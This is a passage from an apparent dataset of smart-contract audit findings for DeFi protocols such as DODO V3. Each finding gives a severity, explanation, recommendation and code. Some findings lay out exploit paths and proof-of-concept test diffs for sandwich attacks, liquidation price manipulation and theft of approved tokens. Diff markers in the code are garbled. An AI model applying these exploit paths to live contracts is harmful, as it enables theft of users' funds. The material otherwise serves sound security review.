than the denominator (LibQuote.quoteOpenAmount(quote)), and the result will be zero due to a rounding error in Solidity.\\nIn this case, the `quote.lockedValues` will not decrease and will remain the same. As a result, the locked balance of the account will remain the same even though a certain amount of the position has been closed. This could cause the account's locked balance to be higher than expected, and the errors will accumulate if it happens many times.","When the `((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote)))` rounds down to zero, this means that a rounding error has occurred as the numerator is smaller than the denominator. The CVA, `filledAmount` or both might be too small.\\nConsider performing input validation against the `filledAmount` within the `fillCloseRequest` function to ensure that the provided values are sufficiently large and will not result in a rounding error.","When an account's locked balances are higher than expected, their available balance will be lower than expected. The available balance affects the amount that users can withdraw from their accounts. The ""silent"" increase in their locked values means that the amount that users can withdraw becomes lesser over time, and these amounts are lost due to the errors.","```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n" +Consecutive symbol price updates can be exploited to drain protocol funds,medium,"Repeatedly updating the symbol prices for the symbols used in Party A's positions mid-way through a liquidation while maintaining the same Party A's UPnL and total unrealized losses leads to more profits for Party B and effectively steals funds from the protocol.\\nThe `setSymbolsPrice` function in the `LiquidationFacetImpl` library is used to set the prices of symbols for Party A's positions. It is called by the liquidator, who supplies the `PriceSig memory priceSig` argument, which contains, among other values, the prices of the symbols as well as the `upnl` and `totalUnrealizedLoss` of Party A's positions.\\nParty A's `upnl` and `totalUnrealizedLoss` values are stored in Party A's liquidation details and enforced to remain the same for consecutive calls to `setSymbolsPrice` via the `require` statement in lines 90-95.\\nHowever, as long as those two values remain the same, the liquidator can set the prices of the symbols to the current market prices (fetched by the Muon app). If a liquidator liquidates Party A's open positions in multiple calls to `liquidatePositionsPartyA` and updates symbol prices in between, Party B potentially receives more profits than they should have.\\nThe git diff below contains a test case to demonstrate the following scenario:\\nGiven the following symbols:\\n`BTCUSDT`\\n`AAVEUSDT`\\nFor simplicity, we assume trading fees are 0.\\nParty A's allocated balance: `100e18 USDT`\\nParty A has two open positions with Party B:\\nID Symbol Order Type Position Type Quantity Price Total Value CVA LF MM Total Locked Leverage\\n1 BTCUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\n2 AAVEUSDT LIMIT LONG 100e18 1e18 100e18 25e18 25e18 0 50e18 2\\nParty A's available balance: 100e18 - 100e18 = 0 USDT\\nNow, the price of `BTCUSDT` drops by 40% to `0.6e18 USDT`. Party A's `upnl` and `totalUnrealizedLoss` are now `-40e18 USDT` and `-40e18 USDT`, respectively.\\nParty A is insolvent and gets liquidated.\\nThe liquidator calls `setSymbolsPrice` for both symbols, setting the price of `BTCUSDT` to `0.6e18 USDT` and the price of `AAVEUSDT` to `1e18 USDT`. The `liquidationDetails` of Party A are as follows:\\nliquidationType: `LiquidationType.NORMAL`\\nupnl: `-40e18 USDT`\\ntotalUnrealizedLoss: `-40e18 USDT`\\ndeficit: 0\\nliquidationFee: `50e18 - 40e18 = 10e18 USDT`\\nThe liquidator first liquidates position 1 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nNow, due to a volatile market, the price of `AAVEUSDT` drops by 40% to `0.6e18 USDT`. The liquidator calls `setSymbolsPrice` again, setting the price of `AAVEUSDT` to `0.6e18 USDT`. `upnl` and `totalUnrealizedLoss` remain the same. Thus the symbol prices can be updated.\\nThe liquidator liquidates position 2 -> Party B receives `40e18 USDT` + `25e18 USDT` (CVA) = `65e18 USDT`\\nParty B received in total `65e18 + 65e18 = 130e18 USDT`, which is `30e18` USDT more than Party A's initially locked balances. Those funds are effectively stolen from the protocol and bad debt.\\nConversely, if both positions had been liquidated in the first call without updating the symbol prices in between, Party B would have received `40e18 + 25e18 = 65e18 USDT`, which Party A's locked balances covered.\\n\\nHow to run this test case:\\nSave git diff to a file named `exploit-liquidation.patch` and run with\\n```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n","Consider preventing the liquidator from updating symbol prices mid-way of a liquidation process.\\nOr, alternatively, store the number of Party A's open positions in the `liquidationDetails` and only allow updating the symbol prices if the current number of open positions is still the same, effectively preventing the liquidator from updating the symbol prices once a position has been liquidated.","A malicious liquidator can cooperate with Party B and by exploiting this issue during a volatile market, can cause Party B to receive more funds (profits, due to being the counterparty to Party A which faces losses) than it should and steal funds from the protocol.",```\\ngit apply exploit-liquidation.patch\\nnpx hardhat test\\n```\\n +User can perform sandwich attack on withdrawReserves for profit,high,"A malicious user could listen to the mempool for calls to `withdrawReserves`, at which point they can perform a sandwich attack by calling `userDeposit` before the withdraw reserves transaction and then `userWithdraw` after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.\\nWhen a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. As specified in an inline comment, the exchange rate is calculated like so:\\n```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n\\nwhere `reserves = info.totalReserves - info.withdrawnReserves`. When the owner of the vault calls `withdrawReserves` the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.\\nBelow is a diff to the existing test suite that demonstrates the sandwich attack in action:\\n```\\ndiff --git a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\nindex a699162..337d1f5 100644\\n--- a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol\\n@@ -233,6 // Add the line below\\n233,47 @@ contract D3VaultTest is TestContext {\\n assertEq(d3Vault.getTotalDebtValue(address(d3MM)), 1300 ether);\\n }\\n \\n// Add the line below\\n function testWithdrawReservesSandwichAttack() public {\\n// Add the line below\\n // Get dToken\\n// Add the line below\\n (address dToken2,,,,,,,,,,) = d3Vault.getAssetInfo(address(token2));\\n// Add the line below\\n \\n// Add the line below\\n // Approve tokens\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n token2.approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n D3Token(dToken2).approve(address(dodoApprove), type(uint256).max);\\n// Add the line below\\n\\n// Add the line below\\n // Set user quotas and mint tokens\\n// Add the line below\\n mockUserQuota.setUserQuota(user1, address(token2), 1000 ether);\\n// Add the line below\\n mockUserQuota.setUserQuota(user2, address(token2), 1000 ether);\\n// Add the line below\\n token2.mint(user1, 1000 ether);\\n// Add the line below\\n token2.mint(user2, 1000 ether);\\n// Add the line below\\n\\n// Add the line below\\n // User 1 deposits to allow pool to borrow\\n// Add the line below\\n vm.prank(user1);\\n// Add the line below\\n d3Proxy.userDeposit(user1, address(token2), 500 ether);\\n// Add the line below\\n token2.mint(address(d3MM), 100 ether);\\n// Add the line below\\n poolBorrow(address(d3MM), address(token2), 100 ether);\\n// Add the line below\\n\\n// Add the line below\\n vm.warp(365 days // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n // Accrue interest from pool borrow\\n// Add the line below\\n d3Vault.accrueInterest(address(token2));\\n// Add the line below\\n uint256 reserves = d3Vault.getReservesInVault(address(token2));\\n// Add the line below\\n\\n// Add the line below\\n // User 2 performs a sandwich attack on the withdrawReserves call to make a profit\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userDeposit(user2, address(token2), 100 ether);\\n// Add the line below\\n vm.prank(vaultOwner);\\n// Add the line below\\n d3Vault.withdrawReserves(address(token2), reserves);\\n// Add the line below\\n uint256 dTokenBalance = D3Token(dToken2).balanceOf(user2);\\n// Add the line below\\n vm.prank(user2);\\n// Add the line below\\n d3Proxy.userWithdraw(user2, address(token2), dToken2, dTokenBalance);\\n// Add the line below\\n assertGt(token2.balanceOf(user2), 1000 ether);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testWithdrawReserves() public {\\n vm.prank(user1);\\n token2.approve(address(dodoApprove), type(uint256).max);\\n```\\n","There are a couple of ways this type of attack could be prevented:\\nUser deposits could have a minimum lock time in the protocol to prevent an immediate withdraw. However the downside is the user will still profit in the same manner due to the fluctuation in exchange rates.\\nIncreasing reserves whilst accruing interest could have an equal and opposite decrease in token balance accounting. Every time reserves increase you are effectively taking token value out of the vault and ""reserving"" it for the protocol. Given the borrow rate is higher than the reserve increase rate, the exchange rate will continue to increase. I think something like the following would work (please note I haven't tested this):\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\nindex 2fb9364..9ad1702 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/new// Remove the line below\\ndodo// Remove the line below\\nv3/contracts/DODOV3MM/D3Vault/D3VaultFunding.sol\\n@@ // Remove the line below\\n157,6 // Add the line below\\n157,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 compoundInterestRate = getCompoundInterestRate(borrowRatePerSecond, deltaTime);\\n totalBorrowsNew = borrowsPrior.mul(compoundInterestRate);\\n totalReservesNew = reservesPrior // Add the line below\\n (totalBorrowsNew // Remove the line below\\n borrowsPrior).mul(info.reserveFactor);\\n// Add the line below\\n info.balance = info.balance // Remove the line below\\n (totalReservesNew // Remove the line below\\n reservesPrior);\\n borrowIndexNew = borrowIndexPrior.mul(compoundInterestRate);\\n \\n accrualTime = currentTime;\\n@@ // Remove the line below\\n232,7 // Add the line below\\n233,7 @@ contract D3VaultFunding is D3VaultStorage {\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n// Remove the line below\\n return (cash // Add the line below\\n info.totalBorrows // Remove the line below\\n (info.totalReserves // Remove the line below\\n info.withdrawnReserves)).div(dTokenSupply);\\n// Add the line below\\n return (cash // Add the line below\\n info.totalBorrows).div(dTokenSupply);\\n } \\n \\n /// @notice Make sure accrueInterests or accrueInterest(token) is called before\\n```\\n",An attacker can perform a sandwich attack on calls to `withdrawReserves` to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.,```\\n// exchangeRate = (cash + totalBorrows -reserves) / dTokenSupply\\n```\\n +Calls to liquidate don't write down totalBorrows which breaks exchange rate,high,"When a pool is liquidated, the `totalBorrows` storage slot for the token in question should be decremented by `debtToCover` in order to keep the exchange rate of the corresponding `pToken` correct.\\nWhen users call `liquidate` to `liquidate` a pool, they specify the amount of debt they want to cover. In the end this is used to write down the borrow amount of the pool in question:\\n```\\nrecord.amount = borrows - debtToCover;\\n```\\n\\nHowever, the `totalBorrows` of the token isn't written down as well (like it should be). The `finishLiquidation` method correctly writes down the `totalBorrows` state.",The `liquidate` method should include the following line to write down the total borrow amount of the debt token being liquidated:\\n```\\ninfo.totalBorrows = info.totalBorrows - debtToCover;\\n```\\n,"When a user calls `liquidate` to `liquidate` a pool, the exchange rate of the token (from its pToken) remains high (because the `totalBorrows` for the token isn't decremented). The result is that users that have deposited this ERC20 token are receiving a higher rate of interest than they should. Because this interest is not being covered by anyone the end result is that the last withdrawer from the vault will not be able to redeem their pTokens because there isn't enough of the underlying ERC20 token available. The longer the period over which interest accrues, the greater the incentive for LPs to withdraw early.",```\\nrecord.amount = borrows - debtToCover;\\n```\\n +"Anyone can sell other users' tokens as `fromToken`, and get the `toToken`'s themselves due to `decodeData.payer` is never checked.",high,"Anyone can sell other users' tokens as `fromToken`, and get the toToken's themselves due to `decodeData.payer` is never checked.\\nLet's examine the token-selling process and the transaction flow.\\nThe user will initiate the transaction with the `sellTokens()` method in the `D3Proxy.sol` contract, and provide multiple inputs like `pool`, `fromToken`, `toToken`, `fromAmount`, `data` etc.\\n```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, ""D3PROXY_VALUE_INVALID"");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n\\nAfter some checks, this method in the `D3Proxy.sol` will make a call to the `sellToken()` function in the pool contract (inherits D3Trading.sol). After this call, things that will happen in the pool contract are:\\nTransferring the toToken's to the ""to"" address (with _transferOut)\\nMaking a callback to `D3Proxy` contract to deposit fromToken's to the pool. (with IDODOSwapCallback(msg.sender).d3MMSwapCallBack)\\nChecking the pool balance and making sure that the fromToken's are actually deposited to the pool. (with this line: IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount)\\n```\\n// File: D3Trading.sol\\n// Method: sellToken()\\n108.--> _transferOut(to, toToken, receiveToAmount);\\n109.\\n110. // external call & swap callback\\n111.--> IDODOSwapCallback(msg.sender).d3MMSwapCallBack(fromToken, fromAmount, data);\\n112. // transfer mtFee to maintainer\\n113. _transferOut(state._MAINTAINER_, toToken, mtFee);\\n114.\\n115. require(\\n116.--> IERC20(fromToken).balanceOf(address(this)) - state.balances[fromToken] >= fromAmount,\\n117. Errors.FROMAMOUNT_NOT_ENOUGH\\n118. );\\n```\\n\\nThe source of the vulnerability is the `d3MMSwapCallBack()` function in the `D3Proxy`. It is called by the pool contract with the `fromToken`, `fromAmount` and `data` inputs to make a `fromToken` deposit to the pool.\\n```\\n//File: D3Proxy.sol \\n /// @notice This callback is used to deposit token into D3MM\\n /// @param token The address of token\\n /// @param value The amount of token need to deposit to D3MM\\n /// @param _data Any data to be passed through to the callback\\n function d3MMSwapCallBack(address token, uint256 value, bytes calldata _data) external override {\\n require(ID3Vault(_D3_VAULT_).allPoolAddrMap(msg.sender), ""D3PROXY_CALLBACK_INVALID"");\\n SwapCallbackData memory decodeData;\\n decodeData = abi.decode(_data, (SwapCallbackData));\\n--> _deposit(decodeData.payer, msg.sender, token, value);\\n }\\n```\\n\\nAn attacker can create a `SwapCallbackData` struct with any regular user's address, encode it and pass it through the `sellTokens()` function, and get the toToken's.\\nYou can say that `_deposit()` will need the payer's approval but the attackers will know that too. A regular user might have already approved the pool & proxy for the max amount. Attackers can easily check any token's allowances and exploit already approved tokens. Or they can simply watch the mempool and front-run any normal seller right after they approve but before they call the `sellTokens()`.","I would recommend to check if the `decodeData.payer == msg.sender` in the beginning of the `sellTokens()` function in `D3Proxy` contract. Because msg.sender will be the pool's address if you want to check it in the `d3MMSwapCallBack()` function, and this check will not be valid to see if the payer is actually the seller.\\nAnother option might be creating a local variable called ""seller"" and saving the msg.sender value when they first started the transaction. After that make `decodeData.payer == seller` check in the `d3MMSwapCallBack()`.",An attacker can sell any user's tokens and steal their funds.,"```\\n// File: D3Proxy.sol\\n function sellTokens(\\n address pool,\\n address to,\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n uint256 minReceiveAmount,\\n bytes calldata data,\\n uint256 deadLine\\n ) public payable judgeExpired(deadLine) returns (uint256 receiveToAmount) {\\n if (fromToken == _ETH_ADDRESS_) {\\n require(msg.value == fromAmount, ""D3PROXY_VALUE_INVALID"");\\n receiveToAmount = ID3MM(pool).sellToken(to, _WETH_, toToken, fromAmount, minReceiveAmount, data);\\n } else if (toToken == _ETH_ADDRESS_) {\\n receiveToAmount =\\n ID3MM(pool).sellToken(address(this), fromToken, _WETH_, fromAmount, minReceiveAmount, data);\\n _withdrawWETH(to, receiveToAmount);\\n // multicall withdraw weth to user\\n } else {\\n receiveToAmount = ID3MM(pool).sellToken(to, fromToken, toToken, fromAmount, minReceiveAmount, data);\\n }\\n }\\n```\\n" +"When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault",high,"When a D3MM pool repays all of the borrowed funds to vault using D3Funding.sol repayAll, an attacker can steal double the amount of those funds from vault. This is because the balance of vault is not updated correctly in D3VaultFunding.sol _poolRepayAll.\\n`amount` should be added in `info.balance` instead of being subtracted.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n\\nA `D3MM pool` can repay all of the borrowed funds from vault using the function D3Funding.sol repayAll which further calls D3VaultFunding.sol poolRepayAll and eventually D3VaultFunding.sol _poolRepayAll.\\n```\\n function repayAll(address token) external onlyOwner nonReentrant poolOngoing {\\n ID3Vault(state._D3_VAULT_).poolRepayAll(token);\\n _updateReserve(token);\\n require(checkSafe(), Errors.NOT_SAFE);\\n }\\n```\\n\\nThe vault keeps a record of borrowed funds and its current token balance.\\n`_poolRepayAll()` is supposed to:\\nDecrease the borrowed funds by the repaid amount\\nIncrease the token balance by the same amount #vulnerability\\nTransfer the borrowed funds from pool to vault\\nHowever, `_poolRepayAll()` is decreasing the token balance instead.\\n```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n .\\n .\\n\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n\\n IERC20(token).safeTransferFrom(pool, address(this), amount);\\n\\n emit PoolRepay(pool, token, amount, interests);\\n }\\n```\\n\\nLet's say a vault has 100,000 USDC A pool borrows 20,000 USDC from vault\\nWhen the pool calls `poolRepayAll()`, the asset info in vault will change as follows:\\n`totalBorrows => 20,000 - 20,000 => 0` // info.totalBorrows - amount\\n`balance => 100,000 - 20,000 => 80,000` // info.balance - amount\\n`tokens owned by vault => 100,000 + 20,000 => 120,000 USDC` // 20,000 USDC is transferred from pool to vault (repayment)\\nThe difference of recorded balance (80,000) and actual balance (120,000) is `40,000 USDC`\\nAn attacker waits for the `poolRepayAll()` function call by a pool.\\nWhen `poolRepayAll()` is executed, the attacker calls D3VaultFunding.sol userDeposit(), which deposits 40,000 USDC in vault on behalf of the attacker.\\nAfter this, the attacker withdraws the deposited amount using D3VaultFunding.sol userWithdraw() and thus gains 40,000 USDC.\\n```\\n function userDeposit(address user, address token) external nonReentrant allowedToken(token) {\\n .\\n .\\n .\\n AssetInfo storage info = assetInfo[token];\\n uint256 realBalance = IERC20(token).balanceOf(address(this)); // check tokens owned by vault\\n uint256 amount = realBalance - info.balance; // amount = 120000-80000\\n .\\n .\\n .\\n IDToken(info.dToken).mint(user, dTokenAmount);\\n info.balance = realBalance;\\n\\n emit UserDeposit(user, token, amount);\\n }\\n```\\n","Issue When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault\\nIn D3VaultFunding.sol _poolRepayAll, do the following changes:\\nCurrent code: `info.balance = info.balance - amount;`\\nNew (replace '-' with '+'): `info.balance = info.balance + amount;`",Loss of funds from vault. The loss will be equal to 2x amount of borrowed tokens that a D3MM pool repays using D3VaultFunding.sol poolRepayAll,"```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n" +possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication,medium,finishLiquidation() divides before multiplying when calculating realDebt.\\n```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n\\nThere will be precision loss when calculating the realDebt because solidity truncates values when dividing and dividing before multiplying causes precision loss.\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\n,don't divide before multiplying,Issue possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\n,```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n +`D3VaultFunding.userWithdraw()` doen not have mindTokenAmount,medium,"`D3VaultFunding.userWithdraw()` doen not have mindTokenAmount, and use `_getExchangeRate` directly.This is vulnerable to a sandwich attack.\\nAs we can see, `D3VaultFunding.userWithdraw()` doen not have mindTokenAmount, and use `_getExchangeRate` directly.\\n```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need ""user"" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill ""user"" param with wrong addresses,\\n // we use ""msg.sender"" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n\\nAnd the `_getExchangeRate()` result is about `cash` , `info.totalBorrows`, info.totalReserves,info.withdrawnReserves,dTokenSupply,This is vulnerable to a sandwich attack leading to huge slippage\\n```\\nfunction _getExchangeRate(address token) internal view returns (uint256) {\\n AssetInfo storage info = assetInfo[token];\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n return (cash + info.totalBorrows - (info.totalReserves - info.withdrawnReserves)).div(dTokenSupply);\\n } \\n```\\n",Add `mindTokenAmount` parameter for `userWithdraw()` function and check if `amount < mindTokenAmount`,This is vulnerable to a sandwich attack.,"```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need ""user"" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill ""user"" param with wrong addresses,\\n // we use ""msg.sender"" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n" +D3Oracle will return the wrong price if the Chainlink aggregator returns price outside min/max range,medium,"Chainlink oracles have a min and max price that they return. If the price goes below the minimum price the oracle will not return the correct price but only the min price. Same goes for the other extremity.\\nBoth `getPrice()` and `getOriginalPrice()` only check `price > 0` not are they within the correct range\\n```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, ""Chainlink: Incorrect Price"");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, ""Chainlink: Stale Price"");\\nrequire(answeredInRound >= roundID, ""Chainlink: Stale Price"");\\n```\\n","Check the latest answer against reasonable limits and/or revert in case you get a bad price\\n```\\n require(price >= minAnswer && price <= maxAnswer, ""invalid price"");\\n```\\n","The wrong price may be returned in the event of a market crash. The functions with the issue are used in `D3VaultFunding.sol`, `D3VaultLiquidation.sol` and `D3UserQuota.sol`","```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, ""Chainlink: Incorrect Price"");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, ""Chainlink: Stale Price"");\\nrequire(answeredInRound >= roundID, ""Chainlink: Stale Price"");\\n```\\n" +parseAllPrice not support the tokens whose decimal is greater than 18,medium,"`parseAllPrice` not support the token decimal is greater than 18, such as NEAR with 24 decimal. Since `buyToken / sellToken` is dependent on `parseAllPrice`, so users can't trade tokens larger than 18 decimal, but DODOv3 is intended to be compatible with all standard ERC20, which is not expected.\\n```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n\\nIf `tokenDecimal > 18`, `18 - tokenDecimal` will revert",Fix decimal to 36 instead of 18,"DODOv3 is not compatible the tokens whose decimal is greater than 18, users can't trade them.",```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n +Wrong assignment of `cumulativeBid` for RangeOrder state in getRangeOrderState function,medium,"Wrong assignment of `cumulativeBid` for RangeOrder state\\nIn `D3Trading`, the `getRangeOrderState` function is returning RangeOrder (get swap status for internal swap) which is assinging wrong toTokenMMInfo.cumulativeBid which suppose to be `cumulativeBid` not `cumulativeAsk`\\nThe error lies in the assignment of `roState.toTokenMMInfo.cumulativeBid`. Instead of assigning `tokenCumMap[toToken].cumulativeAsk`, it should be assigning `tokenCumMap[toToken].cumulativeBid`.\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n\\nThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol\\nFor one case, this `getRangeOrderState` is being used in `querySellTokens` & `queryBuyTokens` which may later called from `sellToken` and `buyToken`. The issue is when calling `_contructTokenState` which can be reverted from `PMMRangeOrder` when buy or sell token\\n```\\nFile: PMMRangeOrder.sol\\n // B\\n tokenState.B = askOrNot ? tokenState.B0 - tokenMMInfo.cumulativeAsk : tokenState.B0 - tokenMMInfo.cumulativeBid;\\n```\\n\\nWhen the `tokenMMInfo.cumulativeBid` (which was wrongly assign from cumulativeAsk) is bigger than `tokenState.B0`, this will revert",Fix the error to\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n// Remove the line below\\n// Remove the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n// Add the line below\\n// Add the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeBid;\\n```\\n,"This wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol. For example reverting state showing a case above.",```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n +D3VaultFunding#checkBadDebtAfterAccrue is inaccurate and can lead to further damage to both LP's and MM,medium,"D3VaultFunding#checkBadDebtAfterAccrue makes the incorrect assumption that a collateral ratio of less than 1e18 means that the pool has bad debt. Due to how collateral and debt weight affect the collateral ratio calculation a pool can have a collateral ratio less than 1e18 will still maintaining debt that is profitable to liquidate. The result of this is that the after this threshold has been passed, a pool can no longer be liquidate by anyone which can lead to continued losses that harm both the LPs and the MM being liquidated.\\nD3VaultFunding.sol#L382-L386\\n```\\n if 